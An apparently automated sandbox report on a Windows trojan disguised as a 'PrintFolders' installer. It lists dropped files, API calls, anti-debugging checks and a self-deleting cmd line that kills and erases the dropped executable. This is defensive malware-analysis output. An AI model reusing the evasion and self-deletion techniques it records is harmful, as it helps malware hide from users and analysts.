Source: file.exe, 00000000.00000002.327340443.0000000000410000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename" vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239484290.00000000021A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.239653432.00000000020B8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename6 vs file.exe
Source: file.exe Binary or memory string: OriginalFilename" vs file.exe
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
Source: PrintFolders.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe"
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp "C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp" /SL4 $40228 "C:\Users\user\Desktop\file.exe" 1252960 51712 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408F74 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70, 0_2_00408F74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00453A8C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,6D744E70, 1_2_00453A8C
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;PrintFolders.exe&quot;)
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963} Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp Jump to behavior
Source: classification engine Classification label: mal88.troj.evad.winEXE@12/23@0/5
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar, 2_2_00401B30
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00454498 GetModuleHandleA,6D2B5550,GetDiskFreeSpaceA, 1_2_00454498
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00405350 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,FindCloseChangeNotification, 2_2_00405350
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1760:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040B1E0 FindResourceA,FreeResource, 1_2_0040B1E0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: `a}{ 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: MFE. 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Command line argument: ZK]Z 2_2_004096F0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Window found: window name: TMainForm Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static file information: File size 1488975 > 1048576
Source: Binary string: E:\DATA\Codework\PrintFolders\source\Release\Russian.pdb source: is-2632S.tmp.1.dr

Data Obfuscation

barindex
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Unpacked PE file: 2.2.PrintFolders.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R;.rgw89:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406584 push 004065C1h; ret 0_2_004065B9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404159 push eax; ret 0_2_00404195
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404229 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00407E84 push ecx; mov dword ptr [esp], eax 0_2_00407E89
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004042AA push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00408B24 push 00408B57h; ret 0_2_00408B4F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404327 push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040438C push 00404435h; ret 0_2_0040442D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00409B70 push 00409BADh; ret 1_2_00409BA5
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040A257 push ds; ret 1_2_0040A258
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00478210 push 004782BBh; ret 1_2_004782B3
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040A22B push ds; ret 1_2_0040A255
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004063C8 push ecx; mov dword ptr [esp], eax 1_2_004063C9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004303A4 push ecx; mov dword ptr [esp], eax 1_2_004303A9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045A74C push ecx; mov dword ptr [esp], eax 1_2_0045A751
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004108E8 push ecx; mov dword ptr [esp], edx 1_2_004108ED
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00412B40 push 00412BA3h; ret 1_2_00412B9B
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00450FF8 push 0045102Bh; ret 1_2_00451023
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040D240 push ecx; mov dword ptr [esp], edx 1_2_0040D242
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004055BD push eax; ret 1_2_004055F9
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00443660 push ecx; mov dword ptr [esp], ecx 1_2_00443664
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040568D push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00479768 push ecx; mov dword ptr [esp], ecx 1_2_0047976D
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040570E push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004057F0 push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040578B push 00405899h; ret 1_2_00405891
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0040F7A0 push ecx; mov dword ptr [esp], edx 1_2_0040F7A2
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00419E40 push ecx; mov dword ptr [esp], ecx 1_2_00419E45
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004311AD push esi; ret 2_2_004311B6
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F4BB push ecx; ret 2_2_0040F4CE
Source: PrintFolders.exe.1.dr Static PE information: section name: .rgw89
Source: initial sample Static PE information: section name: .text entropy: 7.272434889037595
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\is-2632S.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp Jump to dropped file
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe File created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp File created: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423E24
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00423E24 IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_00423E24
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004243F4 IsIconic,SetActiveWindow,SetFocus, 1_2_004243F4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004243AC IsIconic,SetActiveWindow, 1_2_004243AC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0041859C IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_0041859C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00422A74 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 1_2_00422A74
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004177B0 IsIconic,GetCapture, 1_2_004177B0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00477D2C IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 1_2_00477D2C
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00417EE6 IsIconic,SetWindowPos, 1_2_00417EE6
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00417EE8 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00417EE8
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-2632S.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\Russian.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Program Files (x86)\PrintFolders\is-48N1K.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, 2_2_004056A0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004095D0 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery, 0_2_004095D0
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0046C770 FindFirstFileA,FindNextFileA,FindClose, 1_2_0046C770
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00474708 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_00474708
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00451554 FindFirstFileA,GetLastError, 1_2_00451554
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0048A778 FindFirstFileA,6D2B69D0,FindNextFileA,FindClose, 1_2_0048A778
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004729D4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose, 1_2_004729D4
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045CA54 FindFirstFileA,FindNextFileA,FindClose, 1_2_0045CA54
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_00406FEC FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 1_2_00406FEC
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DB60 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DB60
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_0045DEF4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 1_2_0045DEF4
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, 2_2_00404490
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00423E2D FindFirstFileExW, 2_2_00423E2D
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_1000959D FindFirstFileExW, 2_2_1000959D
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Jump to behavior
Source: PrintFolders.exe, 00000002.00000002.325958183.0000000001773000.00000004.00000020.00020000.00000000.sdmp, PrintFolders.exe, 00000002.00000002.326024526.000000000179B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402BF0 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 2_2_00402BF0
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc, 2_2_00402F20
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] 2_2_0044028F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] 2_2_0042041F
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] 2_2_004429E7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] 2_2_00417BAF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] 2_2_100091C7
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] 2_2_10006CE1
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F789 SetUnhandledExceptionFilter, 2_2_0040F789
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0041336B
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0040F5F5
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_0040EBD2
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10006180
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_100035DF
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_10003AD4
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f Jump to behavior
Source: C:\Program Files (x86)\PrintFolders\PrintFolders.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "PrintFolders.exe" /f & erase "C:\Program Files (x86)\PrintFolders\PrintFolders.exe" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "PrintFolders.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp Code function: 1_2_004593E4 GetVersion,GetModuleHandleA,6D2B5550,6D2B5550,6D2B5550,AllocateAndInitializeSid,LocalFree, 1_2_004593E4
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: F.program manager-
Source: PrintFolders.exe, 00000002.00000002.326163828.000000000353F000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: program manager
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoA, 0_2_004051C8
